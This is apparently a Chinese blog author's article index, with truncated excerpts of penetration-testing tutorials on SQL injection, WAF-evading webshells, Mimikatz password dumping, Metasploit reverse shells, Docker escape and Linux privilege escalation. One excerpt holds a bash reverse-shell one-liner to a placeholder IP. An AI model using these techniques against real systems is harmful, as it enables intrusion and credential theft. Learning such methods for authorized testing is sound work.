
技术分享
文章平均质量分 51
大方子
这个作者很懒,什么都没留下…
展开
-
【强烈推荐】ProxyPool-快速构建免费代理池
项目地址:https://github.com/Python3WebSpider/ProxyPool使用ProxyPool-master建立代理IP池(见自己的U盘)电脑提前安装好docker和docker-compose(若未安装可以参考https://www.cnblogs.com/morang/p/9501223.html)解压文件并执行以下命令[root@localhost ~]# cd ProxyPool[root@localhost ProxyPool]# docker-compose原创 2021-07-23 17:04:40 · 7228 阅读 · 0 评论 -
Kali源 + 2020Kali没有arpspoof
用2020Kali的时候发现没有ARPspoof然后老是要百度Kali的源,而且网上的也是各种混杂。就顺便2个问题一起记录下。Kali源(官方 + 网易)#kali 官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib# 网易源deb http://mirrors.163.c原创 2021-03-30 22:09:13 · 7007 阅读 · 0 评论 -
使用Metasploit web_delivery 反弹shell
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效原创 2021-02-07 15:51:05 · 5543 阅读 · 0 评论 -
通过Knockd隐藏SSH,让黑客看不见你的服务器
0X01设备信息:Ubuntu14.04:192.168.61.135Kali:192.168.61.1300X02配置过程:先用Kali探测下Ubuntu的端口情况,可以看到Ubuntu的22端口是正常开放的接下来在Ubuntu上安装Knockdapt-get install updateapt-get install build-essential -yapt-get install knockd -y安装完成后就cat下Knockd的配置/...原创 2021-01-11 16:52:11 · 3586 阅读 · 0 评论 -
powershell + Invoke-Mimikatz.ps1获取系统密码
参照:https://blog.51cto.com/simeon/2126106进行实现Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(1)目标主机具备网络环境power...原创 2019-10-29 10:01:57 · 6476 阅读 · 0 评论 -
一枚过WAF的一句话的编写(加入自己的笔记)
首先说下WAF的正则 安全狗: 匹配关键字 ,出现就直接杀。 D盾:一些常规查杀,并且如果出现$xxx($yyy); 也会直接查杀,哪怕你明确的给$xxx赋一个毫无危害的值 ...............转载 2018-08-21 15:25:08 · 1558 阅读 · 0 评论 -
sql 盲注之正则表达式攻击
-----------------------------------------MYSQL 5+-----------------------------------------我们都已经知道,在MYSQL 5+中 information_schema库中存储了所有的 库名,表明以及字段名信息。故攻击方式如下:1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli...转载 2018-08-30 14:48:27 · 221 阅读 · 0 评论 -
PHP伪协议总结
0x00php://input//所有测试均allow_url_fopen=On,allow_url_include=On!!!php://input是个可以访问请求的原始数据的只读流。POST请求的情况下,最好使用php://input来代替$HTTP_RAW_POST_DATA,因为它不依赖于特定的php.ini指令。而且,这样的情况下$HTTP_RAW_POST...转载 2018-09-06 14:42:30 · 31355 阅读 · 4 评论 -
玩得一手好注入之order by排序篇
0×00 背景看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结下order by 排序注入的知识。 0×01 环境信息测试环境:操作系统ubuntu0.14.04.1 MYSQL:5.5.55-0测试代码:<?php$mysql_server=”10.10.10.136″;$mysql_username=”r...转载 2018-09-06 15:24:24 · 8400 阅读 · 0 评论 -
四个实例递进php反序列化漏洞理解
索引最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行!D0g3为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...转载 2018-09-14 21:30:32 · 8707 阅读 · 3 评论 -
利用PHP中的phar伪协议绕过waf
可能有人已经早已经知道了,不过我也是一次在研究phar扩展的溢出漏洞时发现的一个技巧,就是利用phar:协议,这个协议可能在渗透过程中会帮你绕过一些东西。我能够想到的是有些waf不会防php后缀的文件,但是他会检测里面的内容,我们可以通过包含的方式,包含rar后缀或者phar后缀里面的txt文件或者jpg文件达到绕过防护的目的,具体我也时间细细的把玩。你们可以自己想想,怎样利用才是最好的。...转载 2018-09-14 21:38:03 · 3054 阅读 · 0 评论 -
聊一聊Linux下进程隐藏的常见手法及侦测手段
0x00.前言进程隐藏是恶意软件隐藏自身痕迹逃避系统管理人员发现的常用伎俩之一,当然,安全防护人员有时候也会使用到,比如隐藏蜜罐中的监控进程而不被入侵者觉察等。笔者也曾在多次安全应急响应经历中遇到过多各式各样的进程隐藏伎俩,了解进程隐藏的常见手法及发现手段是每一位安全运维工程师所应掌握的知识点。本文抛砖引玉,浅谈我所了解的Linux下进程隐藏手段及发现技巧,也希望读者能够积极分享自己相关经验与...转载 2018-10-01 22:01:00 · 11691 阅读 · 1 评论 -
Tunnel Manager - From RCE to Docker Escape
题目有些标题党了。这个漏洞是我在测试 biligame 是发现的,此程序监听在 8081 端口,是一个管理 PPTP 的 Web Interface。首先,通过黑盒测试,发现存在一个在 Docker 容器内的命令执行,接着通过 banner 搜索,在 Github 上找到源代码,通过阅读源码,实现了 Docker 容器外的文件读取,最后通过 DirtyCow 来逃逸 Docker。 非常 CTF ...转载 2018-10-02 11:06:20 · 443 阅读 · 0 评论 -
MYSQL注入天书之盲注讲解
原文地址:https://www.cnblogs.com/lcamry/p/5763129.html何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从background-1中,我们可以知道盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注Ps:...转载 2018-08-30 14:39:41 · 673 阅读 · 0 评论 -
Sql注入截取字符串常用函数
在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也成为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检测。 三大法宝:mid(),substr(),left()mid()函数此函数为截取字符串一部分。MID(column_nam...转载 2018-08-30 14:27:21 · 389 阅读 · 0 评论 -
PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)
摘要PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。1....转载 2018-09-04 20:20:25 · 3247 阅读 · 0 评论 -
Meatsploit Framework msfvenom使用简介
2015年6月8日,Wei Chen在rapid7官方博客上发文,将于近期移除metasploit-framework版本中的msfencoder和msfpayload,并使用msfvenom取代。官方的msfvenom使用说明戳这里,下面给出翻译的使用说明。最近一次更新的msf中已经去掉了这两个工具,同时,msfcli也即将被移除。 kali和BT目前使用的MSF依然是旧版,...转载 2018-08-24 14:55:04 · 871 阅读 · 0 评论 -
Web暴力破解--前端JS表单加密进行爆破
0x01 前言 常见的js实现加密的方式有:md5、base64、shal,写了一个简单的demo作为测试。0x02 代码login.html<!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <title>用户登录</title>转载 2018-08-21 16:02:17 · 1967 阅读 · 0 评论 -
深入解析sprintf格式化字符串漏洞
深入解析sprintf格式化字符串漏洞0x00 前言从相遇到相识从相识到相知.........不过你真的懂ta吗这次故事的主角是PHP中的格式化函数sprintf 0x01 sprintf()讲解 首先我们先了解sprintf()函数sprintf() 函数把格式化的字符串写入变量中。sprintf(format,arg1,arg2,arg++...转载 2018-08-28 23:16:20 · 5059 阅读 · 0 评论 -
MS14-064 漏洞测试入侵win7
Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution执...转载 2018-08-21 18:17:15 · 13562 阅读 · 13 评论 -
smb(ms17-010)远程命令执行之msf
本次用到的环境:kali(2016.2)32位系统.ip地址:192.168.1.104目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105具体的步骤如下:kali系统下安装wine32:apt-get install wine32 =================================若kali为64位...转载 2018-08-21 21:28:22 · 2541 阅读 · 0 评论 -
定制sqlmap tamper脚本
前言渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了。测试在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接403了。测试了其他的一些参数,发现过滤了大部分的注入命令,但是可以利用mysql的注释方法进行绕过,例如网站会拦截sleep()函数,可以利用/!50000sleep(5)/绕过拦截,接上...转载 2018-08-29 14:43:03 · 1214 阅读 · 0 评论 -
mysql/*! xxx/**/添加感叹号
一、/* .... */ 在大部分语言中都一样是注释。这个之中的语句是不被执行的。但MYSQL中 为了保持兼容,比如从mysqldump 导出的SQL语句能被其它数据库直接使用,它把一些特有的仅在MYSQL上的语句放在 /*! ... */ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中它会执行。二、mysql /*!50001 注释解释在MySQL里,多行解释...转载 2018-08-25 09:17:13 · 2153 阅读 · 0 评论 -
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
我在代码审计知识星球里提到了Apache最新的一个解析漏洞(CVE-2017-15715):除了帖子中说到的利用方法,我们还可以利用这个漏洞来绕过上传黑名单限制。目标环境比如,目标存在一个上传的逻辑: <?phpif(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext =...转载 2018-08-25 11:37:20 · 22893 阅读 · 1 评论 -
在Windows低权限下利用服务进行提权
先介绍下一个工具---------->AccessChkAccessChk是Sysinternals中的小工具,推荐用3.0版本的,新版存在一些bug。利用这个工具用来检查用户和用户组对文件,目录,注册表项,全局对象和系统服务的权限,在实际配置权限过程中,如果权限设置不当,那么win服务就可能被用于提权 AccessChk的具体介绍可以看这:http://blog.51cto...原创 2018-09-01 10:48:06 · 4256 阅读 · 0 评论 -
Web渗透中的反弹Shell与端口转发的奇淫技巧
奇淫技巧0x00 前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01 反弹shell1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口 bash -i >& /dev/tcp/x.x.x.x/2333 0&g...转载 2018-10-02 23:25:27 · 9813 阅读 · 0 评论 -
Docker Remote api在安全中的应用杂谈
注:本文为“小米安全中心”原创,作者: netxfly ,转载请联系“小米安全中心”概述众所周知,Docker daemon默认是监听在unix socket上的,如unix:///var/run/docker.sock。官方还提供一个Rustful api接口,允许通过TCP远程访问Docker,例如执行以下启动参数可以让docker监听在本地所有地址的2375端口上:doc...转载 2018-10-02 23:44:30 · 1916 阅读 · 0 评论 -
上传JSPX文件绕过网站后缀名检查
这几天在做渗透测试的时候,发现一个有趣的东西。目标有上传漏洞,但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方,然后尝试过变换jsp的大小写,虽然不跳了,但是直接不解析,利用apache的解析漏洞上传文件,也不解析。后来只能放弃…今天在工作中做另外一个站的渗透测试的时候,有个很特别的东西,JSPX,发现可以解析。然后去找了下是否apache默认解析jspx的文件。...转载 2018-10-08 18:49:46 · 3750 阅读 · 1 评论 -
记一道CTF 中遇到的SQL注入新型万能密码问题
0x00. 引言我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真,但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...转载 2018-10-09 11:45:07 · 9003 阅读 · 2 评论 -
Linux枚举及权限提升检查工具——LinEnum
LinEnum是一款Linux文件枚举及权限提升检查工具,可以帮助渗透测试人员对linux系统漏洞或安全问题进行一键式体检。检查内容: 系统内核版本、发行版本系统信息:Hostname网络信息:IP路由信息DNS信息用户:当前用户上次登录用户列出root用户列出‘default’ uid’s 如 0, 1000, 1001 etc列出 i.e. /etc/sh...转载 2018-11-27 21:20:40 · 3327 阅读 · 0 评论 -
Linux提权————利用SUID提权
前言今天给大家带来的是linux下的提权技巧。SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。已知的可用来提权的linux可行性的文件列表如下:Nmap Vim find Bash More Less Nano cp以下命令可以发现...转载 2018-12-05 21:02:39 · 2705 阅读 · 0 评论 -
利用Tomcat Manager的多种方法
您好朋友,今天通过本文我想分享我的经验“如何利用Tomcat Manger应用程序”,如果您有默认登录凭据(tomcat:tomcat)。在玩CTF时,很多时候我发现Apache Tomcat在目标机器上运行,配置了默认登录,这可以帮助我们获得远程机器shell。因此我觉得,我应该编写所有可能的方法来利用tomcat manger应用程序获取远程机器的webshell。表中的内容Tom...翻译 2018-12-22 15:43:14 · 3109 阅读 · 0 评论 -
Runas命令:能让域用户/普通User用户以管理员身份运行指定程序
在某些情况下,为了安全起见,大部分公司都会使用域控制器或只会给员工电脑user的用户权限,这样做能大大提高安全性和可控性,但由此也带来了一些困扰。比如:某些特定的部门(如财务,物流)没有管理员权限,但工作又需要使用特定的插件或程序,且该程序或插件又必须以管理员身份运行,在这种情况下,我们如果将用户的权限提升为管理员,那样会增加安全风险而且可能引起很多不可控的情况。在这种情况下,我们可以使用r...转载 2019-03-07 16:46:05 · 25495 阅读 · 0 评论 -
Empire 反弹回 Metasploit
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86178038在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。这里使用Empire的usem...转载 2019-03-15 19:36:37 · 392 阅读 · 0 评论 -
PHP处理0e开头md5时hash字符串漏洞
在下面的代码中我们可以看到通过md5加密得到的哈希值类型都属于字符串型在PHP中,利用”!=”或”==”来对哈希值进行比较时,PHP会把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。以下纯数字和大写字母类型的哈希值在比较时都为0纯数字类:240610708 0e4620974...原创 2019-05-10 22:47:09 · 1968 阅读 · 0 评论 -
Linux下关闭终端之后继续运行相应的进程
1.后台运行Linux下一般想让某个程序在后台运行,很多都是使用& 在程序结尾来让程序自动运行。比如我们要运行tesh.sh在后台:./tesh.sh &一般这种程序使用& 结尾,如果终端关闭,那么程序也会被关闭2.关闭终端之后继续运行需要使用nohup这个命令,比如我们有个test.sh需要在后台运行,并且希望在 后台能够一直运行,那么就使用noh...转载 2019-06-20 12:40:56 · 2001 阅读 · 0 评论 -
nmap 查看主机上开放的端口
作用:检测网络上的主机检测主机上开放的端口检测操作系统,硬件地址,以及软件版本检测脆弱性的漏洞(Nmap的脚本)扫描方式:1. -sS Tcp SYN Scan 不需要三次握手,速度快优点:半开放扫描,Nmap发送SYN包到远程主机,但是它不会产生任何会话,目标主机几乎不会把连接记入系统日志。(防止对方判断为扫描攻击),扫描速度快,效率高,在工作中使用频率最高 ...转载 2018-10-14 10:21:29 · 4581 阅读 · 0 评论 -
web狗要懂的内网端口转发
先区分正向代理和反向代理(自己的理解)A——B——CA对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A开始实验A(root@192.168.168.1) (kali,具有完备的攻击...转载 2018-10-07 00:27:32 · 1944 阅读 · 0 评论 -
内网渗透之reGeorg+Proxifier
0x00 前言遇到内网环境,防火墙DMZ区域映射外网端口80,使用常规lcx等反弹工具也会被各种安全软件拦截,尝试各自提权无果,这个时候就需要一款内网代理和端口转发工具,穿越防火墙的阻挡直连内网。 0x01 正向代理和反向代理 简单区分一下正向代理和反向代理1、正向代理,是一个位于客户端和原始服务器之间的服务器,为了从原始服务器取得内容,客户端向代理发送一个请求并指定目...转载 2018-10-03 11:24:33 · 5986 阅读 · 0 评论 -
实战Linux下三种不同方式的提权技巧
在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。实验一:利用Linux内核漏洞提权VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到 获取到低权限SHELL后我们通常做下...转载 2018-09-27 22:39:12 · 1374 阅读 · 0 评论